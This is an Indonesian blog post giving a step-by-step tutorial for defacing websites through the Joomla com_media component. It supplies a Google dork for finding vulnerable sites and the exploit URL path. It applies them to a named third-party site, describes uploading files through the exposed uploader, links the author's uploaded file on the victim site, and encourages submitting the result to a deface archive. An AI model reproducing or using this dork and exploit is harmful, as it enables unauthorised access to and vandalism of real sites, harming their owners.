Berhubung udah
banyak banget yang share, jadi saya juga ga mau ketinggalan,, hehehe
Nah, topic kali ini membahas mengenai Teknik Exploit Joomla yang
memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada
penasaran gimana caranya? so easy kok :)
Dork : inurl:com_media site:com
Exploit:
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Pertama
sobat cari dah targetnya dulu di google dengan memanfaatkan dork
diatas, dan kalo bisa dork tersebut dikembangkan lagi yah, biar bisa
nemu target yang fresh :)
Disini saya sudah menemukan tergetnya : http://www.rivit.ca
Nah, sekarang kita tambahin aja exploitnya, jadinya begini:
http://www.rivit.ca/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
maka akan terlihat seperti gambar berikut:
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..
Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa.
kalo berhasil, akan muncul keterangan seperti berikut:
Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
cth: http://www.rivit.ca/images/idca.txt
lihat hasil file yang sudah saya upload tadi :) tinggal Submit aja di deface archiver :p
Sip, segitu aja artikel yang bisa berikan kali ini, mudah2an bermanfaat :)
0 Comments